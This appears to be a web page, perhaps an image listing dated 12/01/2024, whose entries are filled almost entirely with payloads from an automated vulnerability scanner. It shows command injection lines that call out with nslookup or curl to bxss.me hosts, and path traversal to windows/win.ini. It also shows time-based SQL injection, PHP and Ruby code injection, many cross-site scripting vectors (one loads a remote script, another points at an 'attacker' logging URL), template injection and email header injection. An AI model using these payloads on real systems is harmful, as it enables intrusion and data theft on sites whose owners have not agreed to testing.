;(nslookup -q=cname hitjtpbjvdbhob0ad9.bxss.me||curl hitjtpbjvdbhob0ad9.bxss.me)|(nslookup -q=cname hitjtpbjvdbhob0ad9.bxss.me||curl hitjtpbjvdbhob0ad9.bxss.me)&(nslookup -q=cname hitjtpbjvdbhob0ad9.bxss.me||curl hitjtpbjvdbhob0ad9.bxss.me)

image
HfjNUlYZ
12/01/2024

../1

image
echo mmzgta$()\ aureaq\nz^xyu||a #' &echo mmzgta$()\ aureaq\nz^xyu||a #|" &echo mmzgta$()\ aureaq\nz^xyu||a #
12/01/2024

1

image
../../../../../../../../../../../../../../windows/win.ini
12/01/2024

1

image
&echo wrksaw$()\ udtjrc\nz^xyu||a #' &echo wrksaw$()\ udtjrc\nz^xyu||a #|" &echo wrksaw$()\ udtjrc\nz^xyu||a #
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
../HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

$(nslookup -q=cname hitgtpbmrguam1fdd2.bxss.me||curl hitgtpbmrguam1fdd2.bxss.me)

image
HfjNUlYZ
12/01/2024

1<ScRiPt >A6Yq(9567)</ScRiPt>

image
HfjNUlYZ
12/01/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
XcwJRDFY&lt;ScRiPt&gt;U0OM(9780)&lt;/sCripT&gt;
12/01/2024

1

image
'}dfb#{xca}=123
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
|echo mfqaly$()\ jbxtxu\nz^xyu||a #' |echo mfqaly$()\ jbxtxu\nz^xyu||a #|" |echo mfqaly$()\ jbxtxu\nz^xyu||a #
12/01/2024

1

image
XcwJRDFY|echo ytsssd$()\ bukzyd\nz^xyu||a #' |echo ytsssd$()\ bukzyd\nz^xyu||a #|" |echo ytsssd$()\ bukzyd\nz^xyu||a #
12/01/2024

1

image
)
12/01/2024

1

image
HfjNUlYZ
12/01/2024

;(nslookup -q=cname hitvmgxvdirze8a11b.bxss.me||curl hitvmgxvdirze8a11b.bxss.me)|(nslookup -q=cname hitvmgxvdirze8a11b.bxss.me||curl hitvmgxvdirze8a11b.bxss.me)&(nslookup -q=cname hitvmgxvdirze8a11b.bxss.me||curl hitvmgxvdirze8a11b.bxss.me)

image
(nslookup -q=cname hitnuotaxuwuqea1ee.bxss.me||curl hitnuotaxuwuqea1ee.bxss.me))
12/01/2024

1

image
&echo ghtpcz$()\ gkgwoo\nz^xyu||a #' &echo ghtpcz$()\ gkgwoo\nz^xyu||a #|" &echo ghtpcz$()\ gkgwoo\nz^xyu||a #
12/01/2024

1

image
^(#$!@#$)(()))******
12/01/2024

1

image
HfjNUlYZ
12/01/2024

bxss.me

image
HfjNUlYZ
12/01/2024

1<isindex type=image src=1 onerror=A6Yq(9359)>

image
HfjNUlYZ
12/01/2024

-1 OR 2+799-799-1=0+0+0+1

image
HfjNUlYZ&echo bavtnm$()\ thjmat\nz^xyu||a #' &echo bavtnm$()\ thjmat\nz^xyu||a #|" &echo bavtnm$()\ thjmat\nz^xyu||a #
12/01/2024

1

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

-1' OR 2+748-748-1=0+0+0+1 --

image
|echo foereh$()\ pqljcz\nz^xyu||a #' |echo foereh$()\ pqljcz\nz^xyu||a #|" |echo foereh$()\ pqljcz\nz^xyu||a #
12/01/2024

1

image
$(nslookup -q=cname hitrfujtycosec94d6.bxss.me||curl hitrfujtycosec94d6.bxss.me)
12/01/2024

1

image
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
12/01/2024

1

image
&(nslookup -q=cname hitklbgurjwxk87f18.bxss.me||curl hitklbgurjwxk87f18.bxss.me)&'\"`0&(nslookup -q=cname hitklbgurjwxk87f18.bxss.me||curl hitklbgurjwxk87f18.bxss.me)&`'
12/01/2024

1

image
XcwJRDFY
12/01/2024

${9999152+9999785}

image
XcwJRDFY<input autofocus onfocus=U0OM(9099)>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'||sleep(27*1000)*xewykw||'

image
|(nslookup -q=cname hitpvmzhxpmnrf2680.bxss.me||curl hitpvmzhxpmnrf2680.bxss.me)
12/01/2024

1

image
${10000405+9999738}
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'.gethostbyname(lc('hitvp'.'haexfyks806d9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(81).chr(103).chr(77).'

image
HfjNUlYZ
12/01/2024

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

image
XcwJRDFY
12/01/2024

-1)); waitfor delay '0:0:15' --

image
`(nslookup -q=cname hitjynweqiuhydce4e.bxss.me||curl hitjynweqiuhydce4e.bxss.me)`
12/01/2024

1

image
HfjNUlYZ
12/01/2024

".gethostbyname(lc("hitcj"."pfrugzpha64e6.bxss.me."))."A".chr(67).chr(hex("58")).chr(106).chr(65).chr(98).chr(83)."

image
".gethostbyname(lc("hitvl"."bcnvetrn5518b.bxss.me."))."A".chr(67).chr(hex("58")).chr(100).chr(65).chr(98).chr(79)."
12/01/2024

1

image
XcwJRDFY
12/01/2024

1 waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

oJZ0AACC'; waitfor delay '0:0:15' --

image
XcwJRDFY
12/01/2024

http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg

image
HfjNUlYZ
12/01/2024

1<img src=//xss.bxss.me/t/dot.gif onload=A6Yq(9727)>

image
XcwJRDFY}body{zzz:Expre/**/SSion(U0OM(9889))}
12/01/2024

1

image
XcwJRDFY
12/01/2024

Http://bxss.me/t/fit.txt

image
XcwJRDFY
12/01/2024

)

image
'}dfb[[${98991*97996}]]xca
12/01/2024

1

image
)
12/01/2024

1

image
'"()
12/01/2024

1

image
XcwJRDFY
12/01/2024

bxss.me

image
HfjNUlYZ
12/01/2024

1 waitfor delay '0:0:15' --

image
HfjNUlYZ
12/01/2024

';print(md5(31337));$a='

image
HfjNUlYZ'&&sleep(27*1000)*yqgmip&&'
12/01/2024

1

image
HfjNUlYZ
12/01/2024

${@print(md5(31337))}

image
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
12/01/2024

1

image
HfjNUlYZ"&&sleep(27*1000)*kzbmls&&"
12/01/2024

1

image
^(#$!@#$)(()))******
12/01/2024

1

image
XcwJRDFY
12/01/2024

-1)) OR 83=(SELECT 83 FROM PG_SLEEP(15))--

image
HfjNUlYZ"||sleep(27*1000)*sgmnbi||"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

-5 OR 359=(SELECT 359 FROM PG_SLEEP(15))--

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
12/01/2024

1

image
Http://bxss.me/t/fit.txt
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

t8NxDp15' OR 890=(SELECT 890 FROM PG_SLEEP(15))--

image
c:/windows/win.ini
12/01/2024

1

image
XcwJRDFY
12/01/2024

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

image
bxss.me
12/01/2024

1

image
XcwJRDFY<ifRAme sRc=9899.com></IfRamE>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

image
1}}dfb{{98991*97996}}xca
12/01/2024

1

image
";print(md5(31337));$a="
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"

image
XcwJRDFY<a8FM7eK x=9609>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

EA6VRoOC')) OR 55=(SELECT 55 FROM PG_SLEEP(15))--

image
1%}dfb{{98991*97996}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

'.gethostbyname(lc('hitpc'.'okmihrnf5d488.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(122).chr(65).chr(106).chr(83).'

image
XcwJRDFY
12/01/2024

@@hK0JH

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1 bcc:0.705-29432.705.7d86a.19734.2@bxss.me

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY<img sRc='http://attacker-9026/log.php?
12/01/2024

1

image
XcwJRDFY
12/01/2024

".gethostbyname(lc("hitiu"."dtovcktt846e6.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(80).chr(122).chr(68)."

image
XcwJRDFY
12/01/2024

to@example.com> bcc:0.705-29433.705.7d86a.19734.2@bxss.me

image
bxss.me/t/xss.html?%00
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

"+"A".concat(70-3).concat(22*4).concat(99).concat(77).concat(107).concat(88)+(require"socket" Socket.gethostbyname("hitdi"+"qanqnotvca55c.bxss.me.")[3].to_s)+"

image
XcwJRDFY bcc:0.705-29434.705.7d86a.19734.2@bxss.me
12/01/2024

1

image
'.gethostbyname(lc('hitfg'.'bhqyqnttd34c7.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(80).chr(116).chr(86).'
12/01/2024

1

image
1}dfb{98991*97996}xca
12/01/2024

1

image
fYP8LnZ6
12/01/2024

1

image
XcwJRDFY<anqaExM<
12/01/2024

1

image
XcwJRDFY
12/01/2024

'"()

image
XcwJRDFY
12/01/2024

bxss.me/t/xss.html?%00

image
-1' OR 2+871-871-1=0+0+0+1 --
12/01/2024

1

image
XcwJRDFY
12/01/2024

;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

image
HfjNUlYZ
12/01/2024

1'"

image
XcwJRDFY
12/01/2024

1'&&sleep(27*1000)*gjtssv&&'

image
-1' OR 2+841-841-1=0+0+0+1 or 'VPrcbVYZ'='
12/01/2024

1

image
XcwJRDFY
12/01/2024

";print(md5(31337));$a="

image
XcwJRDFY
12/01/2024

1'||sleep(27*1000)*kbcffm||'

image
if(now()=sysdate(),sleep(15),0)
12/01/2024

1

image
XcwJRDFY
12/01/2024

${@print(md5(31337))}

image
XcwJRDFY
12/01/2024

1"||sleep(27*1000)*cvouce||"

image
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
12/01/2024

1

image
1}dfb#{98991*97996}xca
12/01/2024

1

image
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
12/01/2024

1

image
XcwJRDFY
12/01/2024

'+'A'.concat(70-3).concat(22*4).concat(97).concat(72).concat(103).concat(76)+(require'socket' Socket.gethostbyname('hitvy'+'lrsultxj5087f.bxss.me.')[3].to_s)+'

image
XcwJRDFY
12/01/2024

'.print(md5(31337)).'

image
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
12/01/2024

1

image
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
12/01/2024

1

image
"+"A".concat(70-3).concat(22*4).concat(111).concat(72).concat(119).concat(74)+(require"socket" Socket.gethostbyname("hitjj"+"hdwwjtytdf4e7.bxss.me.")[3].to_s)+"
12/01/2024

1

image
1 waitfor delay '0:0:15' --
12/01/2024

1

image
'"()
12/01/2024

1

image
XcwJRDFY
12/01/2024

'"

image
XcwJRDFY
12/01/2024

comment

image
';print(md5(31337));$a='
12/01/2024

1

image
O0VHnz91'; waitfor delay '0:0:15' --
12/01/2024

1

image
XcwJRDFY'&&sleep(27*1000)*vuecsi&&'
12/01/2024

1

image
XcwJRDFY
12/01/2024

<!--

image
";print(md5(31337));$a="
12/01/2024

1

image
XcwJRDFY
12/01/2024

comment/.

image
1}dfb{#98991*97996}xca
12/01/2024

1

image
XcwJRDFY"&&sleep(27*1000)*kisbtp&&"
12/01/2024

1

image
'"
12/01/2024

1

image
XcwJRDFY
12/01/2024

xfs.bxss.me

image
dBmhbqpm'); waitfor delay '0:0:15' --
12/01/2024

1

image
'+'A'.concat(70-3).concat(22*4).concat(110).concat(74).concat(101).concat(77)+(require'socket' Socket.gethostbyname('hitaf'+'pnqelzpndcdc3.bxss.me.')[3].to_s)+'
12/01/2024

1

image
${@print(md5(31337))}
12/01/2024

1

image
comment
12/01/2024

1

image
XcwJRDFY'||sleep(27*1000)*mhelew||'
12/01/2024

1

image
iy4UV8qA')); waitfor delay '0:0:15' --
12/01/2024

1

image
<!--
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'"()&%<zzz><ScRiPt >EV1w(9803)</ScRiPt>

image
${@print(md5(31337))}\
12/01/2024

1

image
xfs.bxss.me
12/01/2024

1

image
'.print(md5(31337)).'
12/01/2024

1

image
1}dfb{@98991*97996}xca
12/01/2024

1

image
bdpkyd0y') OR 261=(SELECT 261 FROM PG_SLEEP(15))--
12/01/2024

1

image
XcwJRDFY
12/01/2024

1'"()&%<zzz><ScRiPt >zuYL(9526)</ScRiPt>

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >EV1w(9700)</ScRiPt>

image
XcwJRDFY'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
12/01/2024

1

image
XcwJRDFY
12/01/2024

'"()&%<zzz><ScRiPt >zuYL(9754)</ScRiPt>

image
HfjNUlYZ'"()&%<zzz><ScRiPt >lnC1(9463)</ScRiPt>
12/01/2024

1

image
1'"
12/01/2024

1

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >Tefp(9170)</ScRiPt>

image
oYBTGnHU
12/01/2024

1

image
1}}dfb{{=98991*97996}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

19395978

image
HfjNUlYZ
12/01/2024

19880064

image
-1 OR 2+85-85-1=0+0+0+1
12/01/2024

1

image
1)dfb@(98991*97996)xca
12/01/2024

1

image
'"()&%<zzz><ScRiPt >0B7r(9082)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

comment

image
'"()&%<zzz><ScRiPt >lnC1(9635)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

comment

image
-1' OR 2+823-823-1=0+0+0+1 --
12/01/2024

1

image
@@fJ3vG
12/01/2024

1

image
HfjNUlYZ
12/01/2024

comment/.

image
XcwJRDFY
12/01/2024

1

image
comment
12/01/2024

1

image
1%>dfb<%=98991*97996%>xca
12/01/2024

1

image
1}dfb{{"abc"|title}}xca
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
nRh11kBN')); waitfor delay '0:0:15' --
12/01/2024

1

image
Wzet37Jw' OR 34=(SELECT 34 FROM PG_SLEEP(15))--
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{{98991*97996}}xca

image
77gP5hSZ') OR 228=(SELECT 228 FROM PG_SLEEP(15))--
12/01/2024

1

image
HfjNUlYZ'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
12/01/2024

1

image
1'"
12/01/2024

1

image
198991*97996*98991*97996
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{98991*97996}xca

image
<th:t="${dfb}#foreach
12/01/2024

1

image
XcwJRDFY
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
dfb{{98991*97996}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

dfb{{98991*97996}}xca

image
XcwJRDFY
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
1}}dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
XcwJRDFY
12/01/2024

19556"();}]9280

image
HfjNUlYZ
12/01/2024

bfg8433<s1﹥s2ʺs3ʹhjl8433

image
XcwJRDFY
12/01/2024

1</script><script>zuYL(9512)</script>

image
1}}AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
12/01/2024

1

image
XcwJRDFY'"()&%<zzz><ScRiPt >zuYL(9765)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb@(98991*97996)xca

image
1}}dfb{{98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ<ScRiPt >0B7r(9523)</ScRiPt>
12/01/2024

1

image
XcwJRDFY9562935
12/01/2024

1

image
dfb<%=98991*97996%>xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb#set($x=98991*97996)${x}xca

image
HfjNUlYZ<W0Z16Y>YKZNF[!+!]</W0Z16Y>
12/01/2024

1

image
1}dfb[[${98991*97996}]]xca
12/01/2024

1

image
bfg1667<s1﹥s2ʺs3ʹhjl1667
12/01/2024

1

image
98991*97996*98991*97996
12/01/2024

1

image
<th:t="${dfb}#foreach
12/01/2024

1

image
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
12/01/2024

1

image
XcwJRDFY<ScR<ScRiPt>IpT>OWCS(9268)</sCr<ScRiPt>IpT>
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{{{this}}}xca

image
'"()&%<zzz><ScRiPt >KB5p(9248)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9181></ScRiPt>
12/01/2024

1

image
dfb{{{this}}}xca
12/01/2024

1

image
HfjNUlYZ9523243
12/01/2024

1

image
dfb#{xca}=123
12/01/2024

1

image
dfb{{'abcd'.toUpperCase()}}xca
12/01/2024

1

image
HfjNUlYZ<isindex type=image src=1 onerror=0B7r(9860)>
12/01/2024

1

image
bfg7881<s1﹥s2ʺs3ʹhjl7881
12/01/2024

1

image
XcwJRDFY9644"();}]9817
12/01/2024

1

image
AAABBBCCC{{define "bla"}}bla{{end}}{{define "dfb"}}xyz{{end}}{{template "dfb"}}CCCBBBAAA
12/01/2024

1

image
XcwJRDFY<ScRiPt >OWCS(9101)</ScRiPt>
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
%58%63%77%4A%52%44%46%59%39%31%31%33%22%28%29%3B%7D%5D%39%37%30%37
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
<th:t="${dfb}#foreach
12/01/2024

1

image
HfjNUlYZ<body onload=0B7r(9554)>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb[[${98991*97996}]]xca

image
XcwJRDFY</script><script>zuYL(9347)</script>
12/01/2024

1

image
dfb[[${98991*97996}]]xca
12/01/2024

1

image
HfjNUlYZ<img src=//xss.bxss.me/t/dot.gif onload=0B7r(9498)>
12/01/2024

1

image
XcwJRDFY<isindex type=image src=1 onerror=OWCS(9456)>
12/01/2024

1

image
dfb{{98991*97996}}xca
12/01/2024

1

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
XcwJRDFY<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9477'>
12/01/2024

1

image
HfjNUlYZ<ScRiPt >lnC1(9947)</ScRiPt>
12/01/2024

1

image
dfb__${98991*97996}__::.x
12/01/2024

1

image
XcwJRDFY<body onload=OWCS(9629)>
12/01/2024

1

image
HfjNUlYZ</script><script>KB5p(9328)</script>
12/01/2024

1

image
XcwJRDFY\u003CScRiPt\OWCS(9666)\u003C/sCripT\u003E
12/01/2024

1

image
HfjNUlYZ<script>lnC1(9110)</script>9110
12/01/2024

1

image
XcwJRDFY&lt;ScRiPt&gt;OWCS(9435)&lt;/sCripT&gt;
12/01/2024

1

image
XcwJRDFY<input autofocus onfocus=OWCS(9340)>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ScR<ScRiPt>IpT>EV1w(9336)</sCr<ScRiPt>IpT>

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
<a HrEF=jaVaScRiPT:>
12/01/2024

1

image
XcwJRDFY}body{zzz:Expre/**/SSion(OWCS(9019))}
12/01/2024

1

image
HfjNUlYZ<ScRiPt >lnC1(9764)</ScRiPt>
12/01/2024

1

image
XcwJRDFYVmiuG <ScRiPt >OWCS(9306)</ScRiPt>
12/01/2024

1

image
XcwJRDFY<WMGTPB>ADQBN[!+!]</WMGTPB>
12/01/2024

1

image
XcwJRDFY<ifRAme sRc=9910.com></IfRamE>
12/01/2024

1

image
XcwJRDFY<aMSV8cg x=9748>
12/01/2024

1

image
XcwJRDFY<img sRc='http://attacker-9855/log.php?
12/01/2024

1

image
XcwJRDFY<aZXOsbz<
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9918'>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<body onload=EV1w(9166)>

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ<ifRAme sRc=9708.com></IfRamE>
12/01/2024

1

image
HfjNUlYZ<body onload=lnC1(9222)>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<img src=//xss.bxss.me/t/dot.gif onload=EV1w(9681)>

image
HfjNUlYZ<aaIqdfS x=9599>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<img src=xyz OnErRor=EV1w(9537)>

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ<img/src=">" onerror=alert(9899)>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1&lt;ScRiPt&gt;EV1w(9659)&lt;/sCripT&gt;

image
XcwJRDFY
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<WJUWL1>JUP5N[!+!]</WJUWL1>

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ<WGMIBM>LTI3L[!+!]</WGMIBM>
12/01/2024

1

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ<ifRAme sRc=9813.com></IfRamE>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<af935Ap x=9150>

image
HfjNUlYZ<agIxivn x=9735>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<img sRc='http://attacker-9817/log.php?

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ'"()&%<zzz><ScRiPt >y6OY(9673)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ9163020
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1'"()&%<zzz><ScRiPt >oWys(9504)</ScRiPt>

image
HfjNUlYZ
12/01/2024

1'"()&%<zzz><ScRiPt >kW62(9789)</ScRiPt>

image
HfjNUlYZ
12/01/2024

'"()&%<zzz><ScRiPt >uMz1(9490)</ScRiPt>

image
HfjNUlYZ
12/01/2024

19592845

image
HfjNUlYZ
12/01/2024

19587914

image
HfjNUlYZ
12/01/2024

1

image
HfjNUlYZ
12/01/2024

bfg7195<s1﹥s2ʺs3ʹhjl7195

image
HfjNUlYZ
12/01/2024

<%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

<%={{={@{#{${dfb}}%>

image
HfjNUlYZ
12/01/2024

dfb{{98991*97996}}xca

image
HfjNUlYZ
12/01/2024

1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>

image
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb[[${98991*97996}]]xca

image
HfjNUlYZ
12/01/2024

"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")

image
HfjNUlYZ
12/01/2024

dfb{98991*97996}xca

image
"}dfb{@98991*97996}xca
12/01/2024

1

image
"print("dfb" . 98991*97996 . "xca");
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ScRiPt >kW62(9584)</ScRiPt>

image
HfjNUlYZ
12/01/2024

dfb{@math key=98991 method="multiply" operand=97996/}xca

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ<ScRiPt >Q9Ha(9856)</ScRiPt>
12/01/2024

1

image
"}dfb{@math key=98991 method="multiply" operand=97996/}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

#{98991*97996*98991*97996}

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{{"abc"|title}}xca

image
HfjNUlYZ<ScRiPt >FxvQ(9489)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb#{xca}=123

image
HfjNUlYZ
12/01/2024

1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9147></ScRiPt>

image
HfjNUlYZ<isindex type=image src=1 onerror=FxvQ(9623)>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

98991*97996*98991*97996

image
XcwJRDFY
12/01/2024

1

image
HfjNUlYZ<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9794'>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{@math key=98991 method="multiply" operand=97996/}xca

image
HfjNUlYZ
12/01/2024

dfb{{98991*97996}}xca

image
HfjNUlYZ
12/01/2024

1<img src=xyz OnErRor=kW62(9742)>

image
HfjNUlYZ<img src=//xss.bxss.me/t/dot.gif onload=FxvQ(9907)>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

dfb{{'abcd'.toUpperCase()}}xca

image
"dfb__${98991*97996}__::.x
12/01/2024

1

image
HfjNUlYZ<img/src=">" onerror=alert(9410)>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ScRiPt >uMz1(9035)</ScRiPt>

image
%48%66%6A%4E%55%6C%59%5A%3C%53%63%52%69%50%74%20%3E%51%39%48%61%289931%29%3C%2F%73%43%72%69%70%54%3E
12/01/2024

1

image
HfjNUlYZ\u003CScRiPt\FxvQ(9684)\u003C/sCripT\u003E
12/01/2024

1

image
'}}dfb{{98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<img/src=">" onerror=alert(9516)>

image
HfjNUlYZ
12/01/2024

1<script>uMz1(9823)</script>

image
HfjNUlYZ
12/01/2024

dfb__${98991*97996}__::.x

image
HfjNUlYZ
12/01/2024

1<script>uMz1(9169)</script>9169

image
HfjNUlYZ<input autofocus onfocus=FxvQ(9649)>
12/01/2024

1

image
<a HrEF=http://xss.bxss.me></a>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1&lt;ScRiPt&gt;xTIk(9864)&lt;/sCripT&gt;

image
HfjNUlYZ
12/01/2024

1<WXGN3N>ALXFF[!+!]</WXGN3N>

image
HfjNUlYZ
12/01/2024

1<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9327></ScRiPt>

image
'}dfb{#98991*97996}xca
12/01/2024

1

image
HfjNUlYZ}body{zzz:Expre/**/SSion(FxvQ(9413))}
12/01/2024

1

image
'}dfb{98991*97996}xca
12/01/2024

1

image
'}}dfb{{=98991*97996}}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

<a HrEF=jaVaScRiPT:>

image
HfjNUlYZ<ifRAme sRc=9519.com></IfRamE>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<ScR<ScRiPt>IpT>aHwx(9585)</sCr<ScRiPt>IpT>

image
'%>dfb<%=98991*97996%>xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1}body{zzz:Expre/**/SSion(xTIk(9935))}

image
'}dfb#set($x=98991*97996)${x}xca
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1krTii <ScRiPt >xTIk(9978)</ScRiPt>

image
XcwJRDFY
12/01/2024

1'"()&%<zzz><ScRiPt >pUeM(9942)</ScRiPt>

image
XcwJRDFY
12/01/2024

1'"()&%<zzz><ScRiPt >d1Ed(9163)</ScRiPt>

image
XcwJRDFY'"()&%<zzz><ScRiPt >vccT(9896)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<img sRc='http://attacker-9826/log.php?

image
'"()&%<zzz><ScRiPt >vccT(9471)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<body onload=uMz1(9013)>

image
XcwJRDFY
12/01/2024

'"()&%<zzz><ScRiPt >d1Ed(9559)</ScRiPt>

image
HfjNUlYZ<ifRAme sRc=9066.com></IfRamE>
12/01/2024

1

image
XcwJRDFY
12/01/2024

19687166

image
HfjNUlYZ
12/01/2024

1<ifRAme sRc=9986.com></IfRamE>

image
bfg7170<s1﹥s2ʺs3ʹhjl7170
12/01/2024

1

image
'}dfb{@math key=98991 method="multiply" operand=97996/}xca
12/01/2024

1

image
XcwJRDFY'"()&%<zzz><ScRiPt >8zg3(9484)</ScRiPt>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<img sRc='http://attacker-9713/log.php?

image
HfjNUlYZ
12/01/2024

%31%3C%53%63%52%69%50%74%20%3E%75%4D%7A%31%289269%29%3C%2F%73%43%72%69%70%54%3E

image
'}dfb#set($x=98991*97996)${x}xca
12/01/2024

1

image
<%={{={@{#{${dfb}}%>
12/01/2024

1

image
HfjNUlYZ
12/01/2024

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9487'>

image
'}dfb{{"abc"|title}}xca
12/01/2024

1

image
